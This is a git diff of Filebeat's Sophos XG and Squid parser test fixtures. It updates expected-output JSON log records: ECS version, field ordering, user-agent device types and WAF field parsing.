"sophos.xg.device": "SFW", + "sophos.xg.device_name": "XG125w", + "sophos.xg.eventtime": "2017-03-16T12:56:01.000+02:00", + "sophos.xg.log_component": "RED", + "sophos.xg.log_subtype": "System", + "sophos.xg.log_type": "Event", + "sophos.xg.message_id": "18014", + "sophos.xg.priority": "Information", + "sophos.xg.red_id": "A350196C47072B0", + "sophos.xg.status": "Connected", + "source.bytes": 0, + "tags": [ + "sophos-xg", + "forwarded" + ] + }, + { + "@timestamp": "2017-03-16T12:53:27.000-02:00", + "client.bytes": 22368, + "destination.bytes": 31488, + "event.code": "066811618015", + "event.dataset": "sophos.xg", + "event.duration": 0, + "event.end": "2017-03-16T12:53:27.000-02:00", + "event.kind": "event", + "event.module": "sophos", + "event.original": "device=\"SFW\" date=2017-03-16 time=12:53:27 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Disconnected\" eventtime=\"2017-03-16 12:53:27 IST\" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message=\"A350196C47072B0/Gaurav Patel is now disconnected\"", + "event.severity": "6", + "event.start": "2017-03-16T12:53:27.000-02:00", + "event.timezone": "-02:00", + "fileset.name": "xg", + "host.name": "firewall.localgroup.local", + "input.type": "log", + "log.level": "informational", + "log.offset": 7072, + "message": "A350196C47072B0/Gaurav Patel is now disconnected", + "observer.product": "XG", + "observer.serial_number": "S1601E1F9FCB7EE", + "observer.type": "firewall", + "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], + "server.bytes": 31488, + "service.type": "sophos", + "sophos.xg.branch_name": "Gaurav Patel", + "sophos.xg.device": "SFW", + "sophos.xg.device_name": "XG125w", + "sophos.xg.eventtime": "2017-03-16T12:53:27.000+02:00", + "sophos.xg.log_component": "RED", + "sophos.xg.log_subtype": "System", + "sophos.xg.log_type": "Event", + "sophos.xg.message_id": "18015", + "sophos.xg.priority": "Information", + "sophos.xg.red_id": "A350196C47072B0", + "sophos.xg.status": "Disconnected", + "source.bytes": 22368, + "tags": [ + "sophos-xg", + "forwarded" + ] + }, + { + "@timestamp": "2017-03-16T12:46:26.000-02:00", + "client.bytes": 0, + "destination.bytes": 0, + "event.code": "066811618016", + "event.dataset": "sophos.xg", + "event.duration": 0, + "event.end": "2017-03-16T12:46:26.000-02:00", + "event.kind": "event", + "event.module": "sophos", + "event.original": "device=\"SFW\" date=2017-03-16 time=12:46:26 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Interim\" eventtime=\"2017-03-16 12:46:26 IST\" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/NY transfered bytes TX: 0 RX: 0\"", + "event.severity": "6", + "event.start": "2017-03-16T12:46:26.000-02:00", + "event.timezone": "-02:00", + "fileset.name": "xg", + "host.name": "firewall.localgroup.local", + "input.type": "log", + "log.level": "informational", + "log.offset": 7491, + "message": "A350196C47072B0/NY transfered bytes TX: 0 RX: 0", + "observer.product": "XG", + "observer.serial_number": "S1601E1F9FCB7EE", + "observer.type": "firewall", + "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], + "server.bytes": 0, + "service.type": "sophos", + "sophos.xg.branch_name": "NY", + "sophos.xg.device": "SFW", + "sophos.xg.device_name": "XG125w", + "sophos.xg.eventtime": "2017-03-16T12:46:26.000+02:00", + "sophos.xg.log_component": "RED", + "sophos.xg.log_subtype": "System", + "sophos.xg.log_type": "Event", + "sophos.xg.message_id": "18016", + "sophos.xg.priority": "Information", + "sophos.xg.red_id": "A350196C47072B0", + "sophos.xg.status": "Interim", + "source.bytes": 0, + "tags": [ + "sophos-xg", + "forwarded" + ] + }, { "@timestamp": "2018-06-06T11:12:10.000-02:00", "event.code": "063711517815", diff --git a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json index 9a3920dc168..055f255a15a 100644 --- a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json @@ -286,8 +286,9 @@ "server.bytes": 739, "server.ip": "10.198.233.48", "service.type": "sophos", + "sophos.xg.PHPSESSID": "jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*", "sophos.xg.contenttype": "text/html", - "sophos.xg.cookie": "; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*", + "sophos.xg.cookie": ";", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", "sophos.xg.extra": "EICAR-AV-Test", @@ -364,7 +365,7 @@ "sophos.xg.contenttype": "text/html", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", - "sophos.xg.extra": "Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header", + "sophos.xg.extra": "Inbound Anomaly Score Exceeded (Total Score: 7,", "sophos.xg.fw_rule_id": "3", "sophos.xg.host": "83.97.20.30", "sophos.xg.log_component": "Web Application Firewall", @@ -373,6 +374,8 @@ "sophos.xg.priority": "Information", "sophos.xg.reason": "WAF Anomaly", "sophos.xg.responsetime": "608", + "sophos.xg.sqli": ",", + "sophos.xg.xss": "): Last Matched Message: Request Missing a User Agent Header", "source.as.number": 9009, "source.as.organization.name": "M247 Ltd", "source.bytes": 295, diff --git a/x-pack/filebeat/module/squid/log/config/input.yml b/x-pack/filebeat/module/squid/log/config/input.yml index 16d64b095c6..41163e62afa 100644 --- a/x-pack/filebeat/module/squid/log/config/input.yml +++ b/x-pack/filebeat/module/squid/log/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/squid/log/test/access1.log-expected.json b/x-pack/filebeat/module/squid/log/test/access1.log-expected.json index 21b51be2dc2..a5c38481912 100644 --- a/x-pack/filebeat/module/squid/log/test/access1.log-expected.json +++ b/x-pack/filebeat/module/squid/log/test/access1.log-expected.json @@ -26,8 +26,8 @@ "login.yahoo.com" ], "related.ip": [ - "10.105.21.199", - "209.73.177.115" + "209.73.177.115", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -37,8 +37,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "CONNECT" + "CONNECT", + "TCP_MISS" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "200", @@ -109,8 +109,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -170,8 +170,8 @@ "www.goonernews.com" ], "related.ip": [ - "207.58.145.61", - "10.105.21.199" + "10.105.21.199", + "207.58.145.61" ], "related.user": [ "badeyek" @@ -241,8 +241,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_HIT" + "TCP_HIT", + "GET" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "200", @@ -300,8 +300,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_HIT", - "GET" + "GET", + "TCP_HIT" ], "rsa.misc.content_type": "text/javascript", "rsa.misc.result_code": "200", @@ -360,8 +360,8 @@ "www.goonernews.com" ], "related.ip": [ - "10.105.21.199", - "207.58.145.61" + "207.58.145.61", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -503,8 +503,8 @@ "www.goonernews.com" ], "related.ip": [ - "10.105.21.199", - "207.58.145.61" + "207.58.145.61", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -515,8 +515,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_REFRESH_HIT" + "TCP_REFRESH_HIT", + "GET" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "304", @@ -576,8 +576,8 @@ "www.goonernews.com" ], "related.ip": [ - "10.105.21.199", - "207.58.145.61" + "207.58.145.61", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -649,8 +649,8 @@ "www.goonernews.com" ], "related.ip": [ - "10.105.21.199", - "207.58.145.61" + "207.58.145.61", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -720,8 +720,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_HIT", - "GET" + "GET", + "TCP_HIT" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "200", @@ -859,8 +859,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "CONNECT" + "CONNECT", + "TCP_MISS" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "200", @@ -917,8 +917,8 @@ "impgb.tradedoubler.com" ], "related.ip": [ - "10.105.21.199", - "217.212.240.172" + "217.212.240.172", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -1134,8 +1134,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_REFRESH_HIT", - "GET" + "GET", + "TCP_REFRESH_HIT" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "304", @@ -1195,8 +1195,8 @@ "www.goonernews.com" ], "related.ip": [ - "207.58.145.61", - "10.105.21.199" + "10.105.21.199", + "207.58.145.61" ], "related.user": [ "badeyek" @@ -1207,8 +1207,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_REFRESH_HIT" + "TCP_REFRESH_HIT", + "GET" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "304", @@ -1275,8 +1275,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -1336,8 +1336,8 @@ "ff.connextra.com" ], "related.ip": [ - "10.105.21.199", - "213.160.98.161" + "213.160.98.161", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -1409,8 +1409,8 @@ "dd.connextra.com" ], "related.ip": [ - "10.105.21.199", - "213.160.98.160" + "213.160.98.160", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -1479,8 +1479,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_DENIED", - "GET" + "GET", + "TCP_DENIED" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -1604,8 +1604,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_DENIED" + "TCP_DENIED", + "GET" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -1661,8 +1661,8 @@ "shttp.msg.yahoo.com" ], "related.ip": [ - "216.155.194.239", - "10.105.33.214" + "10.105.33.214", + "216.155.194.239" ], "related.user": [ "adeolaegbedokun" @@ -1732,8 +1732,8 @@ "hi5.com" ], "related.ip": [ - "204.13.51.238", - "10.105.47.218" + "10.105.47.218", + "204.13.51.238" ], "related.user": [ "nazsoau" @@ -1744,8 +1744,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -1870,8 +1870,8 @@ "shttp.msg.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "216.155.194.239" + "216.155.194.239", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -1999,8 +1999,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_IMS_HIT" + "TCP_IMS_HIT", + "GET" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "304", @@ -2058,8 +2058,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_IMS_HIT" + "TCP_IMS_HIT", + "GET" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "304", @@ -2201,8 +2201,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "200", @@ -2461,8 +2461,8 @@ "shttp.msg.yahoo.com" ], "related.ip": [ - "216.155.194.239", - "10.105.33.214" + "10.105.33.214", + "216.155.194.239" ], "related.user": [ "adeolaegbedokun" @@ -2528,8 +2528,8 @@ "address.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "209.191.93.51" + "209.191.93.51", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -2540,8 +2540,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "text/xml", "rsa.misc.result_code": "200", @@ -2601,8 +2601,8 @@ "fxfeeds.mozilla.org" ], "related.ip": [ - "63.245.209.21", - "10.105.21.199" + "10.105.21.199", + "63.245.209.21" ], "related.user": [ "badeyek" @@ -2670,8 +2670,8 @@ "insider.msg.yahoo.com" ], "related.ip": [ - "68.142.231.252", - "10.105.33.214" + "10.105.33.214", + "68.142.231.252" ], "related.user": [ "adeolaegbedokun" @@ -2737,8 +2737,8 @@ "insider.msg.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "68.142.194.14" + "68.142.194.14", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -2922,8 +2922,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_DENIED", - "POST" + "POST", + "TCP_DENIED" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -3037,8 +3037,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -3164,8 +3164,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -3302,8 +3302,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -3442,8 +3442,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_DENIED", - "POST" + "POST", + "TCP_DENIED" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -3500,8 +3500,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "POST", - "TCP_DENIED" + "TCP_DENIED", + "POST" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -3640,8 +3640,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_REFRESH_HIT" + "TCP_REFRESH_HIT", + "GET" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "304", @@ -3698,8 +3698,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "68.142.219.132" + "68.142.219.132", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -3768,8 +3768,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -3898,8 +3898,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_IMS_HIT", - "GET" + "GET", + "TCP_IMS_HIT" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "304", @@ -4027,8 +4027,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_REFRESH_MISS" + "TCP_REFRESH_MISS", + "GET" ], "rsa.misc.content_type": "application/xml", "rsa.misc.result_code": "200", @@ -4097,8 +4097,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "200", @@ -4156,8 +4156,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_IMS_HIT", - "GET" + "GET", + "TCP_IMS_HIT" ], "rsa.misc.content_type": "image/jpeg", "rsa.misc.result_code": "304", @@ -4215,8 +4215,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_HIT" + "TCP_HIT", + "GET" ], "rsa.misc.content_type": "image/jpeg", "rsa.misc.result_code": "200", @@ -4273,8 +4273,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "68.142.219.132" + "68.142.219.132", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -4284,8 +4284,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "POST" + "POST", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "302", @@ -4415,8 +4415,8 @@ "radio.music.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "68.142.219.132" + "68.142.219.132", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -4567,8 +4567,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -4626,8 +4626,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_DENIED", - "GET" + "GET", + "TCP_DENIED" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -4746,8 +4746,8 @@ "us.news1.yimg.com" ], "related.ip": [ - "213.160.98.159", - "10.105.33.214" + "10.105.33.214", + "213.160.98.159" ], "related.user": [ "adeolaegbedokun" @@ -4758,8 +4758,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "image/jpeg", "rsa.misc.result_code": "200", @@ -4886,8 +4886,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -4959,8 +4959,8 @@ "us.a2.yimg.com" ], "related.ip": [ - "213.160.98.152", - "10.105.33.214" + "10.105.33.214", + "213.160.98.152" ], "related.user": [ "adeolaegbedokun" @@ -5029,8 +5029,8 @@ "radio.launch.yahoo.com" ], "related.ip": [ - "68.142.219.132", - "10.105.33.214" + "10.105.33.214", + "68.142.219.132" ], "related.user": [ "adeolaegbedokun" @@ -5041,8 +5041,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -5097,8 +5097,8 @@ "us.bc.yahoo.com" ], "related.ip": [ - "68.142.213.132", - "10.105.33.214" + "10.105.33.214", + "68.142.213.132" ], "related.user": [ "adeolaegbedokun" @@ -5177,8 +5177,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "200", @@ -5232,8 +5232,8 @@ "pclick.internal.yahoo.com" ], "related.ip": [ - "216.109.124.55", - "10.105.33.214" + "10.105.33.214", + "216.109.124.55" ], "related.user": [ "adeolaegbedokun" @@ -5448,8 +5448,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "304", @@ -5505,8 +5505,8 @@ "login.yahoo.com" ], "related.ip": [ - "10.105.21.199", - "209.73.177.115" + "209.73.177.115", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -5516,8 +5516,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "CONNECT", - "TCP_MISS" + "TCP_MISS", + "CONNECT" ], "rsa.misc.content_type": "-", "rsa.misc.result_code": "200", @@ -5650,8 +5650,8 @@ "a1568.g.akamai.net" ], "related.ip": [ - "10.105.33.214", - "213.160.98.159" + "213.160.98.159", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -5782,8 +5782,8 @@ "a1568.g.akamai.net" ], "related.ip": [ - "213.160.98.167", - "10.105.33.214" + "10.105.33.214", + "213.160.98.167" ], "related.user": [ "adeolaegbedokun" @@ -5855,8 +5855,8 @@ "a1568.g.akamai.net" ], "related.ip": [ - "10.105.33.214", - "213.160.98.159" + "213.160.98.159", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -5940,8 +5940,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_MISS" + "TCP_MISS", + "GET" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "304", @@ -5999,8 +5999,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_DENIED" + "TCP_DENIED", + "GET" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "407", @@ -6114,8 +6114,8 @@ "launch.adserver.yahoo.com" ], "related.ip": [ - "10.105.33.214", - "216.109.125.112" + "216.109.125.112", + "10.105.33.214" ], "related.user": [ "adeolaegbedokun" @@ -6126,8 +6126,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "image/gif", "rsa.misc.result_code": "200", @@ -6184,8 +6184,8 @@ "uk.f250.mail.yahoo.com" ], "related.ip": [ - "10.105.21.199", - "217.12.10.96" + "217.12.10.96", + "10.105.21.199" ], "related.user": [ "badeyek" @@ -6196,8 +6196,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "text/html", "rsa.misc.result_code": "200", @@ -6314,8 +6314,8 @@ "us.js2.yimg.com" ], "related.ip": [ - "213.160.98.169", - "10.105.21.199" + "10.105.21.199", + "213.160.98.169" ], "related.user": [ "badeyek" @@ -6326,8 +6326,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "GET", - "TCP_SWAPFAIL_MISS" + "TCP_SWAPFAIL_MISS", + "GET" ], "rsa.misc.content_type": "application/x-javascript", "rsa.misc.result_code": "200", @@ -6385,8 +6385,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_HIT", - "GET" + "GET", + "TCP_HIT" ], "rsa.misc.content_type": "text/css", "rsa.misc.result_code": "200", @@ -6458,8 +6458,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "TCP_MISS", - "GET" + "GET", + "TCP_MISS" ], "rsa.misc.content_type": "application/x-javascript", "rsa.misc.result_code": "200", diff --git a/x-pack/filebeat/module/squid/log/test/generated.log-expected.json b/x-pack/filebeat/module/squid/log/test/generated.log-expected.json index 0613980f3e6..39d375f0690 100644 --- a/x-pack/filebeat/module/squid/log/test/generated.log-expected.json +++ b/x-pack/filebeat/module/squid/log/test/generated.log-expected.json @@ -22,16 +22,16 @@ "example.net" ], "related.ip": [ - "10.251.224.219", - "10.234.224.44" + "10.234.224.44", + "10.251.224.219" ], "related.user": [ "tation" ], "rsa.internal.messageid": "PROPFIND", "rsa.misc.action": [ - "PROPFIND", - "deny" + "deny", + "PROPFIND" ], "rsa.misc.content_type": "ciade", "rsa.misc.result_code": "liqua", @@ -61,6 +61,7 @@ "url.top_level_domain": "org", "user.name": "tation", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -91,16 +92,16 @@ "example.com" ], "related.ip": [ - "10.70.36.222", - "10.102.123.34" + "10.102.123.34", + "10.70.36.222" ], "related.user": [ "doeiu" ], "rsa.internal.messageid": "PURGE", "rsa.misc.action": [ - "PURGE", - "deny" + "deny", + "PURGE" ], "rsa.misc.content_type": "volup", "rsa.misc.result_code": "olupt", @@ -132,6 +133,7 @@ "url.top_level_domain": "org", "user.name": "doeiu", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -158,8 +160,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.net", - "internal.example.com" + "internal.example.com", + "example.net" ], "related.ip": [ "10.142.172.64", @@ -203,6 +205,7 @@ "url.top_level_domain": "com", "user.name": "tia", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -240,8 +243,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "allow", - "GET" + "GET", + "allow" ], "rsa.misc.content_type": "taev", "rsa.misc.result_code": "quiavo", @@ -273,6 +276,7 @@ "url.subdomain": "api", "url.top_level_domain": "org", "user_agent.device.name": "5024D_RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61", "user_agent.os.full": "Android 9", @@ -311,8 +315,8 @@ ], "rsa.internal.messageid": "PUT", "rsa.misc.action": [ - "PUT", - "cancel" + "cancel", + "PUT" ], "rsa.misc.content_type": "aquaeabi", "rsa.misc.result_code": "laboreet", @@ -344,6 +348,7 @@ "url.top_level_domain": "org", "user.name": "onev", "user_agent.device.name": "POCOPHONE F1", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -374,8 +379,8 @@ "api.example.com" ], "related.ip": [ - "10.175.107.139", - "10.12.195.60" + "10.12.195.60", + "10.175.107.139" ], "related.user": [ "mrema" @@ -418,6 +423,7 @@ "url.top_level_domain": "org", "user.name": "mrema", "user_agent.device.name": "ZTE Blade V1000RU", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) 